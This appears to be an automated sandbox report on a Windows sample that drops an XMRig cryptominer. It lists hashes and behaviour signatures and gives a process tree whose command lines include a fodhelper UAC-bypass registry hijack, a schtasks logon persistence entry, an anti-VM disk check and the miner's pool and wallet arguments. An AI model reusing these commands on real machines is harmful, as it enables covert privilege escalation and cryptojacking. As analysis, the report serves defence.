Analysis
max time kernel: 148s
max time network: 141s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09/10/2024, 11:47
Static task: static1
Behavioral task: behavioral1
Sample: 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe
Resource: win7-20240903-en
General
Target: 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe
Size: 7.8MB
MD5: 38be83afea1e906c05e5b851253cbc6a
SHA1: 85841044836479ac3c0b9fb7f1f28928621a4a99
SHA256: 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
SHA512: 17334120d971f389db66d529e76f4385948723868bbaeb3dda45ef0988167f11288fdf65d976179889f13bbea128dd9b768e515a91f18ad2812770020d9b68f7
SSDEEP: 196608:UB4i/VIa9g50YQjhHTbq7kGFco1JMdMZoWtz+oeT4wBYR5+Pmk+uy:U6aK6ZSFco1JtZDt+b4F5Hk+u
Malware Config
Signatures
XMRig Miner payload (8 IoCs)
resource | yara_rule
behavioral2/memory/4772-47-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-49-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-52-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-54-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-53-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-51-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-55-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
behavioral2/memory/4772-58-0x0000000140000000-0x0000000140786000-memory.dmp | xmrig
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe
Executes dropped EXE (4 IoCs)
pid | Process
2184 | paint.exe
2576 | FodhelperBypassUAC.exe
2504 | services64.exe
3576 | sihost64.exe
Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 1648 set thread context of 4772 | 1648 | conhost.exe | 107
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Modifies registry class (10 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings | FodhelperBypassUAC.exe
Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell | FodhelperBypassUAC.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command\ = "cmd.exe" | FodhelperBypassUAC.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command\DelegateExecute | FodhelperBypassUAC.exe
Key deleted | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command | FodhelperBypassUAC.exe
Key deleted | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell | FodhelperBypassUAC.exe
Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open\command | FodhelperBypassUAC.exe
Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open | FodhelperBypassUAC.exe
Key deleted | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\Shell\open | FodhelperBypassUAC.exe
Key deleted | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings | FodhelperBypassUAC.exe
Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3092 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process | occurrences
512 | conhost.exe | 1
1648 | conhost.exe | 2
4772 | explorer.exe | 61
Suspicious use of AdjustPrivilegeToken (46 IoCs)
description | pid | Process
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (each twice; 42 entries) | 1604 | WMIC.exe
Token: SeDebugPrivilege | 512 | conhost.exe
Token: SeDebugPrivilege | 1648 | conhost.exe
Token: SeLockMemoryPrivilege (twice) | 4772 | explorer.exe
Suspicious use of WriteProcessMemory (50 IoCs)
description | pid | Process | procid_target | occurrences
PID 4804 wrote to memory of 1644 | 4804 | 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe | 86 | 2
PID 4804 wrote to memory of 2184 | 4804 | 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe | 88 | 2
PID 4804 wrote to memory of 2576 | 4804 | 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe | 89 | 2
PID 2576 wrote to memory of 4156 | 2576 | FodhelperBypassUAC.exe | 90 | 2
PID 1644 wrote to memory of 1604 | 1644 | cmd.exe | 92 | 2
PID 1644 wrote to memory of 872 | 1644 | cmd.exe | 93 | 2
PID 4156 wrote to memory of 1172 | 4156 | cmd.exe | 94 | 2
PID 1172 wrote to memory of 1784 | 1172 | fodhelper.exe | 96 | 2
PID 2184 wrote to memory of 512 | 2184 | paint.exe | 98 | 3
PID 512 wrote to memory of 1056 | 512 | conhost.exe | 99 | 2
PID 1056 wrote to memory of 3092 | 1056 | cmd.exe | 101 | 2
PID 512 wrote to memory of 920 | 512 | conhost.exe | 102 | 2
PID 920 wrote to memory of 2504 | 920 | cmd.exe | 104 | 2
PID 2504 wrote to memory of 1648 | 2504 | services64.exe | 105 | 3
PID 1648 wrote to memory of 3576 | 1648 | conhost.exe | 106 | 2
PID 1648 wrote to memory of 4772 | 1648 | conhost.exe | 107 | 15
PID 3576 wrote to memory of 2452 | 3576 | sihost64.exe | 108 | 3
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree; depth shown in brackets, signatures listed under each process)

[1] C:\Users\Admin\AppData\Local\Temp\425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3.exe"
    PID: 4804
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b.bat" "
      PID: 1644
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\Wbem\WMIC.exe
        command line: wmic diskdrive get Model
        PID: 1604
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\findstr.exe
        command line: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        PID: 872

  [2] C:\Users\Admin\AppData\Local\Temp\paint.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\paint.exe"
      PID: 2184
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\conhost.exe
        command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\paint.exe"
        PID: 512
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\cmd.exe
          command line: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          PID: 1056
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\schtasks.exe
            command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            PID: 3092
            - Scheduled Task/Job: Scheduled Task

      [4] C:\Windows\System32\cmd.exe
          command line: "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          PID: 920
          - Suspicious use of WriteProcessMemory

        [5] C:\Users\Admin\AppData\Local\Temp\services64.exe
            command line: C:\Users\Admin\AppData\Local\Temp\services64.exe
            PID: 2504
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory

          [6] C:\Windows\System32\conhost.exe
              command line: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
              PID: 1648
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory

            [7] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                PID: 3576
                - Executes dropped EXE
                - Suspicious use of WriteProcessMemory

              [8] C:\Windows\System32\conhost.exe
                  command line: "C:\Windows\System32\conhost.exe" "/sihost64"
                  PID: 2452

            [7] C:\Windows\explorer.exe
                command line: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
                PID: 4772
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken

  [2] C:\Users\Admin\AppData\Local\Temp\FodhelperBypassUAC.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\FodhelperBypassUAC.exe"
      PID: 2576
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\cmd.exe
        command line: /c C:\Windows\System32\fodhelper.exe
        PID: 4156
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\fodhelper.exe
          command line: C:\Windows\System32\fodhelper.exe
          PID: 1172
          - Suspicious use of WriteProcessMemory

        [5] C:\Windows\system32\cmd.exe
            command line: "cmd.exe"
            PID: 1784
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 539B
MD5: b245679121623b152bea5562c173ba11
SHA1: 47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d
SHA256: 73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f
SHA512: 75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

Filesize: 11KB
MD5: 9eb62648c9cc2f1edd3e9cef736f9c5c
SHA1: 6ddd252a86f1184c57f6c3624a36543dde0e9fbc
SHA256: 991a39a81f86da3ee222e4832edfbeb6a2b9ac182243e868d34094669cff3971
SHA512: 0f0a3b29384dc557d5efa20d801159ba495ae63399ff3af925bb4b099b1855fe3acfb782871c2b50fc68032ad6cf70f307e87dc34321f1be408c7c041d409e92

Filesize: 5.0MB
MD5: 21986423b4fadce84294b0357b589099
SHA1: 3009cf439a166ed1e44ad5d67e42626d7998b3d0
SHA256: a420a6a98959a1ff28f81054e0a04c1e9e95361d9cebf2f92fdacd9b3a8709a6
SHA512: 0cbc3255ba1760d0d6faaa116b36c2efd5a74e69f0e362ac3d82ebff6fae46b8e63137557adeb7f80bb56ff8e823c903a0d41058a430ae461108febe78dfe0e9

Filesize: 2.1MB
MD5: 9ca610eb2f785c8d2ddf2a50347039ed
SHA1: db44eda1468ee8fac51c88bc0d3298826cb22dc5
SHA256: 0404b99e5df31ab12b2abdb9aa805e1adef3936b8a0b234f601e5aee11289655
SHA512: 864a98a7e7f69b4945d424a0c6b3ab43e3292e1783392a398c175a7ca34f32e97aaacaf0db1913a80fe67353e385a7c2fdf01389bda7e12a5dd8c248cd472bb5

Filesize: 30KB
MD5: 61d09675a406e39f17f2ea03a3cb8ccc
SHA1: ed3b8e75d6fa0b61a3e18bd308f61647a7abe161
SHA256: 43702440b1cb03293360d7012333845039b807b50c6f187c9e6ccdad1d65da89
SHA512: e5964e6e4ca28bce1396ed66a220099922e66338813b0b1d13a2306fe0b338e4cfb157444b4a11640a8916410c43379b54ed244fca009316522b67cde98d41f3